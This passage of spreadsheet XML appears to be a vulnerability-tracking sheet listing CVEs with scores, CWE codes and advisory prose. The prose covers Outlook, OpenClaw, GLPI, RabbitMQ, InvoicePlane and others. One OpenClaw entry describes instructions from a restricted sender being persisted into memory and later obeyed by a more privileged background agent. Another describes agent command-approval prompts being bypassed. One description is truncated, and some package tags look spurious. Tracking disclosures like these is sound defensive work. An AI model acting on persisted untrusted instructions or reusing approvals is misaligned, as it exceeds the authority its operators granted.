      <c r="I128" s="5" t="inlineStr"/>
      <c r="J128" s="5" t="inlineStr"/>
      <c r="K128" s="5" t="inlineStr"/>
      <c r="L128" s="5" t="inlineStr"/>
      <c r="M128" s="5" t="inlineStr"/>
      <c r="N128" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O128" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P128" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q128" s="5" t="inlineStr"/>
      <c r="R128" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S128" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100208</t>
        </is>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B129" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100535</t>
        </is>
      </c>
      <c r="D129" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E129" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G129" s="5" t="inlineStr"/>
      <c r="H129" s="5" t="inlineStr"/>
      <c r="I129" s="5" t="inlineStr"/>
      <c r="J129" s="5" t="inlineStr">
        <is>
          <t>npm, gin, rust</t>
        </is>
      </c>
      <c r="K129" s="5" t="inlineStr"/>
      <c r="L129" s="5" t="inlineStr"/>
      <c r="M129" s="5" t="inlineStr"/>
      <c r="N129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O129" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P129" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q129" s="5" t="inlineStr"/>
      <c r="R129" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S129" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') versions &gt;= 2026.4.5 and &lt; 2026.8.1 can lose the originating requester's restrictions and untrusted provenance when session-derived text is persisted to session memory. In deployments where session-memory capture and dreaming are enabled, a restricted external sender whose messages are admitted with limited tools can persist instructions that are later supplied to an unattended background (dreaming) agent holding broader file and command capabilities, allowing actions beyond the authority of the original turn and affecting files, commands, or services available to that agent. Exploitation requires the content to be captured, selected for later processing, and followed by the model. The issue is fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100535</t>
        </is>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B130" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100541</t>
        </is>
      </c>
      <c r="D130" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E130" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F130" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G130" s="5" t="inlineStr"/>
      <c r="H130" s="5" t="inlineStr"/>
      <c r="I130" s="5" t="inlineStr"/>
      <c r="J130" s="5" t="inlineStr">
        <is>
          <t>npm, gin</t>
        </is>
      </c>
      <c r="K130" s="5" t="inlineStr"/>
      <c r="L130" s="5" t="inlineStr"/>
      <c r="M130" s="5" t="inlineStr"/>
      <c r="N130" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O130" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P130" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q130" s="5" t="inlineStr"/>
      <c r="R130" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="S130" s="5" t="inlineStr">
        <is>
          <t>OpenClaw's Matrix integration (npm package @openclaw/matrix) versions &gt;= 2026.2.2 and &lt; 2026.8.1 lowercase complete Matrix user IDs — including historical localparts and the case-sensitive server-name portion — when deriving the OpenClaw authorization identity. As a result, distinct authenticated Matrix accounts can normalize to the same authorization identity. A Matrix participant controlling a colliding account identifier (a protocol-valid identifier that differs from the configured one only by characters OpenClaw case/Unicode folds; display-name matching is not required) can inherit allowlist, owner-command, exec-approval, or plugin-approval authority configured for another account. The issue is fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100541</t>
        </is>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B131" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100543</t>
        </is>
      </c>
      <c r="D131" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E131" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F131" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G131" s="5" t="inlineStr"/>
      <c r="H131" s="5" t="inlineStr"/>
      <c r="I131" s="5" t="inlineStr"/>
      <c r="J131" s="5" t="inlineStr">
        <is>
          <t>npm, go, gin</t>
        </is>
      </c>
      <c r="K131" s="5" t="inlineStr"/>
      <c r="L131" s="5" t="inlineStr"/>
      <c r="M131" s="5" t="inlineStr"/>
      <c r="N131" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O131" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P131" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q131" s="5" t="inlineStr"/>
      <c r="R131" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S131" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package openclaw) before 2026.8.1 could include deterministic hashes computed over the original, unredacted configuration in redacted configuration responses. When the Gateway password had low entropy and the remaining configuration values were reconstructable, these hashes acted as offline password verifiers: a caller able to obtain the redacted configuration (for example via config.get) could test password candidates offline without going through the rate-limited Gateway authentication path. Recovering the password could grant the documented shared-secret operator authority. Secret references were not affected in the same way. The issue is fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100543</t>
        </is>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B132" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100558</t>
        </is>
      </c>
      <c r="D132" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E132" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F132" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G132" s="5" t="inlineStr"/>
      <c r="H132" s="5" t="inlineStr"/>
      <c r="I132" s="5" t="inlineStr"/>
      <c r="J132" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K132" s="5" t="inlineStr"/>
      <c r="L132" s="5" t="inlineStr"/>
      <c r="M132" s="5" t="inlineStr"/>
      <c r="N132" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O132" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P132" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q132" s="5" t="inlineStr"/>
      <c r="R132" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S132" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.8.1 contain a resource exhaustion vulnerability in the Gateway listener that allows unauthenticated clients to retain response sockets by sending WebSocket upgrade requests without matching connection semantics. Attackers can repeatedly send malformed upgrade requests to exhaust listener resources and cause denial of service without consuming the WebSocket pre-auth connection budget.</t>
        </is>
      </c>
      <c r="T132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100558</t>
        </is>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B133" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100560</t>
        </is>
      </c>
      <c r="D133" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E133" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F133" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G133" s="5" t="inlineStr"/>
      <c r="H133" s="5" t="inlineStr"/>
      <c r="I133" s="5" t="inlineStr"/>
      <c r="J133" s="5" t="inlineStr"/>
      <c r="K133" s="5" t="inlineStr"/>
      <c r="L133" s="5" t="inlineStr"/>
      <c r="M133" s="5" t="inlineStr"/>
      <c r="N133" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O133" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P133" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q133" s="5" t="inlineStr"/>
      <c r="R133" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S133" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.8.1 contain an authorization bypass vulnerability where Allow Always approvals for exact commands persist as path-only grants on macOS and Linux. Attackers can reuse the same executable with different arguments to execute commands without triggering new approval prompts, potentially accessing files or internal services.</t>
        </is>
      </c>
      <c r="T133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100560</t>
        </is>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B134" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-10758</t>
        </is>
      </c>
      <c r="D134" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E134" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F134" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G134" s="5" t="inlineStr"/>
      <c r="H134" s="5" t="inlineStr"/>
      <c r="I134" s="5" t="inlineStr"/>
      <c r="J134" s="5" t="inlineStr"/>
      <c r="K134" s="5" t="inlineStr"/>
      <c r="L134" s="5" t="inlineStr"/>
      <c r="M134" s="5" t="inlineStr"/>
      <c r="N134" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O134" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P134" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q134" s="5" t="inlineStr"/>
      <c r="R134" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S134" s="5" t="inlineStr">
        <is>
          <t>Esri LERC is an open-source image or raster format which supports rapid encoding and decoding for any pixel type. A Heap based Out-of-Bounds Write via Integer Overflow in LERC versions 4.1.0 and earlier may allow a remote, unauthenticated attacker who can pass specifically crafted attacker controlled imagery to an application that uses LERC to crash the application, leading to a denial of service.</t>
        </is>
      </c>
      <c r="T134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-10758</t>
        </is>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B135" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-13456</t>
        </is>
      </c>
      <c r="D135" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E135" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F135" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G135" s="5" t="inlineStr"/>
      <c r="H135" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I135" s="5" t="inlineStr"/>
      <c r="J135" s="5" t="inlineStr">
        <is>
          <t>php, go, gin, hp</t>
        </is>
      </c>
      <c r="K135" s="5" t="inlineStr"/>
      <c r="L135" s="5" t="inlineStr"/>
      <c r="M135" s="5" t="inlineStr"/>
      <c r="N135" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O135" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P135" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q135" s="5" t="inlineStr"/>
      <c r="R135" s="5" t="inlineStr">
        <is>
          <t>CWE-98</t>
        </is>
      </c>
      <c r="S135" s="5" t="inlineStr">
        <is>
          <t>The WP Maps – Google Maps,OpenStreetMap,Mapbox,Store Locator,Listing,Directory &amp; Filters plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 4.9.8 via the 'page' parameter parameter. This makes it possible for authenticated attackers, with subscriber-level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t>
        </is>
      </c>
      <c r="T135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-13456</t>
        </is>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B136" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49850</t>
        </is>
      </c>
      <c r="D136" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E136" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F136" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G136" s="5" t="inlineStr"/>
      <c r="H136" s="5" t="inlineStr"/>
      <c r="I136" s="5" t="inlineStr"/>
      <c r="J136" s="5" t="inlineStr">
        <is>
          <t>requests, gin</t>
        </is>
      </c>
      <c r="K136" s="5" t="inlineStr"/>
      <c r="L136" s="5" t="inlineStr"/>
      <c r="M136" s="5" t="inlineStr"/>
      <c r="N136" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O136" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P136" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q136" s="5" t="inlineStr"/>
      <c r="R136" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-98</t>
        </is>
      </c>
      <c r="S136" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. Prior to 1.7.2, InvoicePlane exposes Invoices::delete() and Invoices::delete_invoice_tax() as state-changing routes without requiring POST and validating a CSRF token. When an authenticated administrator loads attacker-controlled content that requests an affected route, the application can delete an invoice or invoice tax record. The cross-origin action can remove financial data without the administrator's intent. This issue is fixed in version 1.7.2.</t>
        </is>
      </c>
      <c r="T136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49850</t>
        </is>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B137" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50547</t>
        </is>
      </c>
      <c r="D137" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E137" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F137" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G137" s="5" t="inlineStr"/>
      <c r="H137" s="5" t="inlineStr"/>
      <c r="I137" s="5" t="inlineStr"/>
      <c r="J137" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K137" s="5" t="inlineStr"/>
      <c r="L137" s="5" t="inlineStr"/>
      <c r="M137" s="5" t="inlineStr"/>
      <c r="N137" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O137" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P137" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q137" s="5" t="inlineStr"/>
      <c r="R137" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-98</t>
        </is>
      </c>
      <c r="S137" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. Prior to 1.7.2, InvoicePlane's Invoices::generate_xml() method appends a database-derived xml_id to the XMLconfigs helper directory and includes the resulting PHP path without validating the identifier. A low-privileged attacker who can influence the e-invoice configuration can use traversal sequences to include an existing PHP file. The standalone advisory establishes local file inclusion; code execution requires a separate file-upload or file-write primitive. This issue is fixed in version 1.7.2.</t>
        </is>
      </c>
      <c r="T137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50547</t>
        </is>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B138" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52622</t>
        </is>
      </c>
      <c r="D138" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E138" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F138" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G138" s="5" t="inlineStr"/>
      <c r="H138" s="5" t="inlineStr"/>
      <c r="I138" s="5" t="inlineStr"/>
      <c r="J138" s="5" t="inlineStr"/>
      <c r="K138" s="5" t="inlineStr"/>
      <c r="L138" s="5" t="inlineStr"/>
      <c r="M138" s="5" t="inlineStr"/>
      <c r="N138" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O138" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P138" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q138" s="5" t="inlineStr"/>
      <c r="R138" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S138" s="5" t="inlineStr">
        <is>
          <t>An issue in Wellav Technologies Co., Ltd Wellav WES Emergency Broadcast Terminal WES100, WES270, WES280, and WES290 before 08-08-2023 allows a remote attacker to obtain sensitive information via the global API request wrapper function</t>
        </is>
      </c>
      <c r="T138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52622</t>
        </is>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B139" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C139" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-5267</t>
        </is>
      </c>
      <c r="D139" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E139" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F139" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G139" s="5" t="inlineStr"/>
      <c r="H139" s="5" t="inlineStr"/>
      <c r="I139" s="5" t="inlineStr"/>
      <c r="J139" s="5" t="inlineStr"/>
      <c r="K139" s="5" t="inlineStr"/>
      <c r="L139" s="5" t="inlineStr"/>
      <c r="M139" s="5" t="inlineStr"/>
      <c r="N139" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O139" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P139" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q139" s="5" t="inlineStr"/>
      <c r="R139" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S139" s="5" t="inlineStr">
        <is>
          <t>Ciena Navigator Network
Control Suite (NCS) contains an information exposure vulnerability in an
event-streaming API that does not properly enforce authentication. An
unauthenticated attacker with network access to the affected service could
access the event stream and potentially obtain sensitive information.</t>
        </is>
      </c>
      <c r="T139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-5267</t>
        </is>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B140" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53610</t>
        </is>
      </c>
      <c r="D140" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E140" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F140" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G140" s="5" t="inlineStr"/>
      <c r="H140" s="5" t="inlineStr"/>
      <c r="I140" s="5" t="inlineStr"/>
      <c r="J140" s="5" t="inlineStr"/>
      <c r="K140" s="5" t="inlineStr"/>
      <c r="L140" s="5" t="inlineStr"/>
      <c r="M140" s="5" t="inlineStr"/>
      <c r="N140" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O140" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P140" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q140" s="5" t="inlineStr"/>
      <c r="R140" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S140" s="5" t="inlineStr">
        <is>
          <t>GLPI is a free asset and IT management software package. From 11.0.0 until 11.0.8, an attacker can craft a URL for a dashboard that reflects attacker-controlled markup without sufficient output encoding. A user who opens the crafted URL triggers reflected cross-site scripting in the dashboard. This issue is fixed in version 11.0.8.</t>
        </is>
      </c>
      <c r="T140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53610</t>
        </is>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B141" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53625</t>
        </is>
      </c>
      <c r="D141" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E141" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F141" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G141" s="5" t="inlineStr"/>
      <c r="H141" s="5" t="inlineStr"/>
      <c r="I141" s="5" t="inlineStr"/>
      <c r="J141" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K141" s="5" t="inlineStr"/>
      <c r="L141" s="5" t="inlineStr"/>
      <c r="M141" s="5" t="inlineStr"/>
      <c r="N141" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O141" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P141" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q141" s="5" t="inlineStr"/>
      <c r="R141" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S141" s="5" t="inlineStr">
        <is>
          <t>GLPI is a free asset and IT management software package. From 0.70 until 10.0.26 and 11.0.8, a technician can manipulate the authtype value through the API to change another user's authentication method. Under configurations using the legacy API REST interface or SSO logins, this can change a super-administrator's authentication method and enable account takeover. This issue is fixed in versions 11.0.8 and 10.0.26.</t>
        </is>
      </c>
      <c r="T141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53625</t>
        </is>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B142" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57443</t>
        </is>
      </c>
      <c r="D142" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E142" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F142" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G142" s="5" t="inlineStr"/>
      <c r="H142" s="5" t="inlineStr"/>
      <c r="I142" s="5" t="inlineStr"/>
      <c r="J142" s="5" t="inlineStr"/>
      <c r="K142" s="5" t="inlineStr"/>
      <c r="L142" s="5" t="inlineStr">
        <is>
          <t>pip:scbe-aethermoore</t>
        </is>
      </c>
      <c r="M142" s="5" t="inlineStr">
        <is>
          <t>4.2.1</t>
        </is>
      </c>
      <c r="N142" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O142" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P142" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q142" s="5" t="inlineStr"/>
      <c r="R142" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S142" s="5" t="inlineStr">
        <is>
          <t>SCBE-AETHE</t>
        </is>
      </c>
      <c r="T142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57443</t>
        </is>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B143" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67237</t>
        </is>
      </c>
      <c r="D143" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E143" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F143" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G143" s="5" t="inlineStr"/>
      <c r="H143" s="5" t="inlineStr"/>
      <c r="I143" s="5" t="inlineStr"/>
      <c r="J143" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K143" s="5" t="inlineStr"/>
      <c r="L143" s="5" t="inlineStr"/>
      <c r="M143" s="5" t="inlineStr"/>
      <c r="N143" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O143" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P143" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q143" s="5" t="inlineStr"/>
      <c r="R143" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S143" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.2.0 until 4.2.8 and 4.3.2, set_token_auth/2 inserted a bearer token from the Authorization header or access_token cookie into OAuth bootstrap JavaScript without escaping, allowing attacker-controlled token content to execute JavaScript in the management UI origin. The endpoint is exposed before authentication only when management.oauth_enabled is true, and exploitation through the cookie path additionally requires the attacker to plant an access_token cookie on the management host. This issue is fixed in versions 4.2.8 and 4.3.2.</t>
        </is>
      </c>
      <c r="T143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67237</t>
        </is>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
